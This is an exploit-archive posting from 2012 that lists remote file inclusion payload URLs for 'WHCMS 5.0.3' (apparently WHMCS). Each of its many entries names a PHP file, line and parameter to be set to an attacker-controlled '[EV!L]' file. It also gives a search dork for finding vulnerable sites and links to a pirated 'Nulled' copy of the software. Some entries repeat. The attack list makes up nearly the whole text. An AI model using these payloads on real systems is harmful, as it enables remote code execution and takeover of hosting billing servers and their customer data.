Profile image for mrk studios EL-KAHINA on June 19, 2012
WHCMS version 5.0.3 suffers from a remote file inclusion vulnerability.
Platforms
na
Category
webapps
Tags
exploit remote code execution file inclusion
Source
packetstormsecurity.org
Download
Exploit Code

WHCMS 5.0.3 Remote File Inclusion


=============================
WHCMS 5.0.3 RFI Vulnerability 
=============================

           # Vendor: http://www111.uploadic.com:182/d/lv3zgp6yj2cfgxklqxi4mynirfnjs2nyh24iq333xeusev45v5xeuv7m/WHCMS-5.0.3%20Nulled-FuckCopyright.Net.rar

           # Date: 2012-4-2 

           # Author : El-Kahina 

       # Tested on : Xp3

########################################################

# Dork : Copyright © WHMCS 2005-2012 

-------------

Function: require    File: announcements.php            Line: 77
Exploit: http://localhost/WHCMS/announcements.php?supportmodulepath=[EV!L]

##################################################

Function: require    File: announcements.php            Line: 77
Exploit: http://localhost/WHCMS/announcements.php?supportmodulepath=[EV!L]

##################################################

Function: include    File: dbconnect.php            Line: 460
Exploit: http://localhost/WHCMS/dbconnect.php?langfilepath=[EV!L]

##################################################

Function: include    File: dbconnect.php            Line: 460
Exploit: http://localhost/WHCMS/dbconnect.php?langfilepath=[EV!L]

##################################################

Function: require    File: downloads.php            Line: 142
Exploit: http://localhost/WHCMS/downloads.php?supportmodulepath=[EV!L]

##################################################

Function: require    File: downloads.php            Line: 142
Exploit: http://localhost/WHCMS/downloads.php?supportmodulepath=[EV!L]

##################################################

Function: require    File: index.php            Line: 51
Exploit: http://localhost/WHCMS/index.php?modulepath=[EV!L]

##################################################

Function: require    File: index.php            Line: 81
Exploit: http://localhost/WHCMS/index.php?addonlangfile=[EV!L]

##################################################

Function: require    File: index.php            Line: 51
Exploit: http://localhost/WHCMS/index.php?modulepath=[EV!L]

##################################################

Function: require    File: index.php            Line: 81
Exploit: http://localhost/WHCMS/index.php?addonlangfile=[EV!L]

##################################################

Function: require_once    File: clientareafunctions.php            Line: 313
Exploit: http://localhost/WHCMS/includes/clientareafunctions.php?gateway}=[EV!L]

##################################################

Function: include    File: core.display_debug_console.php            Line: 2
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.display_debug_console.php?_compile_path=[EV!L]

##################################################

Function: include_once    File: core.load_resource_plugin.php            Line: 2
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.load_resource_plugin.php?_plugin_file=[EV!L]

##################################################

Function: include    File: core.process_compiled_include.php            Line: 1
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.process_compiled_include.php?smarty=[EV!L]

##################################################

Function: include    File: core.smarty_include_php.php            Line: 1
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.smarty_include_php.php?params[smarty_include_vars]=[EV!L]

##################################################

Function: include    File: core.write_compiled_include.php            Line: 1
Exploit: http://localhost/WHCMS/includes/smarty/internals/core.write_compiled_include.php?smarty=[EV!L]

##################################################

Function: include    File: function.config_load.php            Line: 5
Exploit: http://localhost/WHCMS/includes/smarty/plugins/function.config_load.php?_compile_file=[EV!L]

##################################################

Function: require    File: boleto.php            Line: 128
Exploit: http://localhost/WHCMS/modules/gateways/boleto/boleto.php?banco=[EV!L]

##################################################

Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
------------------------------------------
----------------------------------------------------------

Comments

blog comments powered by Disqus